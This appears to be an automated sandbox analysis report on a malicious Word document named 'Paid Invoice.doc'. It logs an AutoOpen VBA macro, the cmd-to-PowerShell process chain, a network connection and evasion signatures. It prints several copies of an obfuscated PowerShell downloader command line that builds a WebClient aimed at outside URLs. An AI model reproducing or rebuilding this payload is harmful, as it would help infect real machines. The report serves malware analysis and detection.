Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Searches the installation path of Mozilla Firefox

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Paid Invoice[1].doc.1.dr	OLE, VBA macro line: Sub AutoOpen()
Source: Paid Invoice.doc.usc4tz8.partial.1.dr	OLE, VBA macro line: Sub AutoOpen()

Document contains an embedded VBA macro which may execute processes

Show sources

Source: Paid Invoice[1].doc.1.dr	OLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice[1].doc.1.dr	OLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0
Source: Paid Invoice.doc.usc4tz8.partial.1.dr	OLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice.doc.usc4tz8.partial.1.dr	OLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 203.195.212.211 443

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 3137
Source: unknown	Process created: Commandline size = 2912
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: Commandline size = 3137
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2912

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe	Binary or memory string: Progman
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe	Binary or memory string: Program Manager
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe	Binary or memory string: Shell_TrayWnd

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
